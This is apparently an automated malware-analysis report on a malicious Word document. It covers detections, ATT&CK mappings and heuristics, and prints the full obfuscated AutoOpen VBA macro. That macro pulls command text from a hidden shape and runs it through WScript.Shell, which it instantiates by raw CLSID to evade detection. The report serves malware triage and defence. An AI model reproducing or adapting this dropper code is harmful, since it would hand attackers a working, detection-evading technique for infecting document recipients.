MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that uses the AutoOpen function to execute a command. This command invokes cmd.exe with obfuscated arguments that appear to download and execute a second-stage payload from a constructed URL. The macro also attempts to instantiate the dangerous COM class WScript.Shell, further indicating malicious intent.
Heuristics 9
-
ClamAV: Doc.Malware.Sload-6768899-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sload-6768899-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Set LqfarBBF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + lSBsq) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set LqfarBBF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + lSBsq) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9197 bytes |
SHA-256: 7ac558f01ea1d4f4d8537aff78a7dfef4e4fb5dcfb386f2666c857da827f03c8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
149 of 220 identifiers look randomly generated (e.g. 'AtwGUaJHEhkMnR') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "vvHzpVdQmlPSj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case lHSiIEjEJ
Case 106689022
JkAwSR = Hex(CHcnonO)
VoiZokd = Cos(193760893)
kIorX = 152236150
Case 146777760
dZHLZnmw = Hex(YnRzTf)
mivVkci = Sqr(207880165 / CSng(45341169 - Cos(303879610 - 79268186) + dhikG + Rnd(8156933 - 72282793)))
GKvBwd = Hex(MqMIQcT)
End Select
On Error Resume Next
Select Case uGPztU
Case 80066148
TwAnoFVEa = Hex(pJsajRr)
zjYRSj = Cos(158949450)
SiMKnUzKA = 305204326
Case 295047977
CipluS = Hex(EVTawFd)
dUCfTPv = Sqr(252789547 / CSng(285500423 - Cos(287474754 - 105488610) + VMhalYbO + Rnd(125198942 - 301657600)))
WADTXwDO = Hex(KzUpw)
End Select
Set cACBrcEf = Shapes("AtwGUaJHEhkMnR")
On Error Resume Next
Select Case fmlmWw
Case 284838776
wdMkv = Hex(zwzCFh)
RGFJZVwlL = Cos(73989805)
TmXDAbnQm = 105628658
Case 136942984
mKuZv = Hex(TwfZU)
jfcwdu = Sqr(136714754 / CSng(259871207 - Cos(120778133 - 126999894) + ItuzXP + Rnd(269546996 - 311219670)))
wFTzivB = Hex(rPOuRKXU)
End Select
On Error Resume Next
Select Case TRCZGYIq
Case 278864415
fPpSFjL = Hex(iicWID)
kzwUE = Cos(252112167)
wboAl = 241782525
Case 21543657
mJiDTn = Hex(NSIwU)
jDzJzZW = Sqr(163099183 / CSng(67651671 - Cos(145615829 - 252412413) + ZTOdEvbJQ + Rnd(316297959 - 122387720)))
FjMhljLHR = Hex(PXrqlLj)
End Select
On Error Resume Next
Select Case svIWYGz
Case 59045107
fOYvwidX = Hex(paMCF)
XYRtJA = Cos(138258275)
ERrbUBzu = 40910085
Case 155164512
qljzTWz = Hex(ahqMqqv)
zoEzkKjTd = Sqr(33412843 / CSng(16128483 - Cos(57282106 - 146982061) + uToYO + Rnd(177744907 - 281382074)))
zXJduzO = Hex(AlYCz)
End Select
On Error Resume Next
Select Case vzVnJuf
Case 312510715
GEtEz = Hex(ulWXTFwOD)
sZnVF = Cos(341309453)
aiDMBqwV = 309396274
Case 161495380
iNuzO = Hex(QTFiP)
wjSmRUr = Sqr(168753056 / CSng(24970975 - Cos(44646283 - 109666873) + atmtua + Rnd(9431304 - 158775682)))
vfpGvKiF = Hex(uJKHFcjD)
End Select
dDHLRf = "" + BRnWYSbU + tjFMUO + rhpHPj + cACBrcEf.TextFrame.TextRange.Text + fiVdGi + EQkTIo + cdMsji
On Error Resume Next
Select Case kCfbk
Case 294317110
JtAzQjlZu = Hex(XZBiwCnb)
owEzaoTuJ = Cos(234540993)
JVjjtDSz = 151975382
Case 221438674
HIinLWd = Hex(zrzpEzFw)
JwmcpFi = Sqr(12870099 / CSng(296564319 - Cos(139888679 - 240856071) + kpENMovPm + Rnd(189462999 - 322294993)))
XkzKjb = Hex(oHsoavzR)
End Select
On Error Resume Next
Select Case ticcaKu
Case 287077696
MbvinLuJc = Hex(OHwiwKvI)
RvAWAMPw = Cos(123923334)
hqnzN = 17764142
Case 337814127
tpcNdEZGU = Hex(AdSiBGZzL)
vVYPb = Sqr(52816491 / CSng(310122531 - Cos(284558712 - 176933727) + ibzTB + Rnd(130728763 - 70988708)))
Rwwts = Hex(vpjCpj)
End Select
On Error Resume Next
Select Case TNnZvREPI
Case 41142863
LGdEuFowa = Hex(cYGZt)
BIIjiKk = Cos(126203819)
ZRapb = 64895411
Case 163894775
IWnosb = Hex(kElnr)
hzCqCHzW = Sqr(77823821 / CSng(5439857 - Cos(146509680 - 69963338) + VnNHzzDEz + Rnd(22079052 - 39759468)))
JhDzZZwb = Hex(rRYwYC)
End Select
Set LqfarBBF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + lSBsq)
On Error Resume Next
Select Case FzziN
Case 243734976
jNzcti = Hex(HADXPAVYW)
FGFWj = Cos(115178555)
tJadRo = 45778859
Case 84892833
XDbzjqKOd = Hex(uwkSmhcpY)
fwAvm = Sqr(225066432 / CSng(240888853 - Cos(54875134 - 101861368) + MwKRdRwZb + Rnd(104077630 - 320167309)))
tpXOJrnvp = Hex(iFSbDfKwF)
End Select
On Error Resume Next
Select Case DQrXWoHjF
Case 227852834
hLVAGz = Hex(GWLYJ)
tVtLZLRPj = Cos(43945134)
PJwTIQX = 291842291
Case 290513551
doOGO = Hex(IlumiHv)
AuvKuRC = Sqr(6064386 / CSng(30182182 - Cos(294207161 - 239403095) + BjwGnjRpQ + Rnd(217234607 - 201640735)))
KiJil = Hex(wIOSTN)
End Select
On Error Resume Next
Select Case QBNwCWAQ
Case 65362740
nQVmVEvY = Hex(LEQhSSOm)
DrSKwckJh = Cos(188989781)
zuzuEiO = 30322423
Case 122358794
WiWcjizT = Hex(iojIMSNcS)
CMWTukQEW = Sqr(188879811 / CSng(232929535 - Cos(26369709 - 62340469) + GjMviO + Rnd(329247112 - 239650647)))
mwpPmmbr = Hex(vLPaA)
End Select
Const citlbP = 0
On Error Resume Next
Select Case jwiMwS
Case 107200381
TiSBk = Hex(QrzZKWaip)
AphqZFUzt = Cos(232419654)
vaiFo = 97021820
Case 210271065
AtjAbUuw = Hex(KtkAIqMGl)
jONUIBm = Sqr(136803807 / CSng(113397089 - Cos(129486342 - 132695481) + HuzowQp + Rnd(34714082 - 147434178)))
GdnzwJn = Hex(SwDpzWnY)
End Select
On Error Resume Next
Select Case CHpcz
Case 236679346
NkvZmPD = Hex(vjzRpQFAO)
UlaoUhwm = Cos(220324635)
WXiNpk = 279034050
Case 262528533
zljNuQQH = Hex(qkwGbvcwz)
QNbziqW = Sqr(158805557 / CSng(331003561 - Cos(249131549 - 186665267) + aRQQu + Rnd(267242902 - 158055032)))
XDaCwwPP = Hex(mkqmRXWWl)
End Select
On Error Resume Next
Select Case SDDAcZCAt
Case 264062545
HCPMiiJp = Hex(WAJfWztI)
iXJHTIoNV = Cos(438513)
AIqPq = 200659759
Case 237171322
zCdwc = Hex(ZStYicj)
ILQazjHXR = Sqr(56993264 / CSng(59190836 - Cos(231064522 - 258838986) + JuosPp + Rnd(72157320 - 273985578)))
ajitq = Hex(prXaFAfwQ)
End Select
On Error Resume Next
Select Case IWOLfzJ
Case 20437470
kEziC = Hex(ZwzwOV)
GUGjj = Cos(144539995)
bYKjFo = 12099378
Case 329409845
Nnuhl = Hex(rlDtu)
MmYTEFQu = Sqr(30544200 / CSng(312871809 - Cos(110793117 - 259553222) + aLuQZOJbu + Rnd(233785588 - 68838494)))
nREcVj = Hex(bjPmmNAi)
End Select
On Error Resume Next
Select Case zlmso
Case 199065590
HUJwYYLB = Hex(KNMcb)
nScQoIwwi = Cos(35506963)
Achka = 341903551
Case 50623229
NTfcoN = Hex(FhoVqU)
CzTPYpdI = Sqr(159859482 / CSng(205718420 - Cos(281831079 - 119054328) + iUUkNEI + Rnd(91312236 - 190175986)))
qoDaD = Hex(HIOlUa)
End Select
On Error Resume Next
Select Case HnZMhinRk
Case 233461681
nGUnkw = Hex(vwAzwj)
BJMbnJUdW = Cos(64086583)
EwNNSso = 283743450
Case 146545611
MqzAbf = Hex(cqHqpUfV)
qwZwJjK = Sqr(81091076 / CSng(214691539 - Cos(2246847 - 11439174) + dILFMdpS + Rnd(84892047 - 176965475)))
dlBfCk = Hex(disrCr)
End Select
LqfarBBF.Run# dDHLRf, citlbP
On Error Resume Next
Select Case vKprbOsl
Case 203381594
VCLcBRHB = Hex(iAZbjRnl)
jSpMf = Cos(328073300)
RjOwGqbI = 146719873
Case 7524072
EqSEBlc = Hex(oWiJaodjB)
tIXNtk = Sqr(240178619 / CSng(301643513 - Cos(31914199 - 192782238) + YQFirjuqi + Rnd(111920305 - 25450526)))
fJMiXnIc = Hex(awdsC)
End Select
On Error Resume Next
Select Case ULnQjHCk
Case 333193034
QlAssNl = Hex(LmRnTIZw)
AsHVuS = Cos(266710826)
dEhbDG = 257143757
Case 251218450
iWEAMqHds = Hex(Whrirj)
CrrDVSMb = Sqr(98410875 / CSng(57929923 - Cos(30863787 - 61288942) + fiBVi + Rnd(19525726 - 290538601)))
nBzsCC = Hex(kmZpsQ)
End Select
On Error Resume Next
Select Case TJMuV
Case 178742339
cwjFCFY = Hex(viBKDN)
WzStL = Cos(191381702)
IURQmKZt = 311787294
Case 323568830
Iwjdk = Hex(vBFbrVQIv)
nPcbPA = Sqr(267326832 / CSng(274185099 - Cos(82227673 - 260914150) + SOrCnEDv + Rnd(98505983 - 109036895)))
MZzJXMQwB = Hex(rrliS)
End Select
On Error Resume Next
Select Case ODrSwLSvc
Case 12180480
TvcTSGb = Hex(jAfdiu)
YOpfnvfwM = Cos(322100654)
XtFEFzEb = 313218724
Case 83653085
zZQGHGw = Hex(ZIXBmDGz)
bnwPWk = Sqr(229157365 / CSng(225973262 - Cos(68101884 - 184463785) + fZGwivOQP + Rnd(221730088 - 259959417)))
CdWZzrS = Hex(zBqAI)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.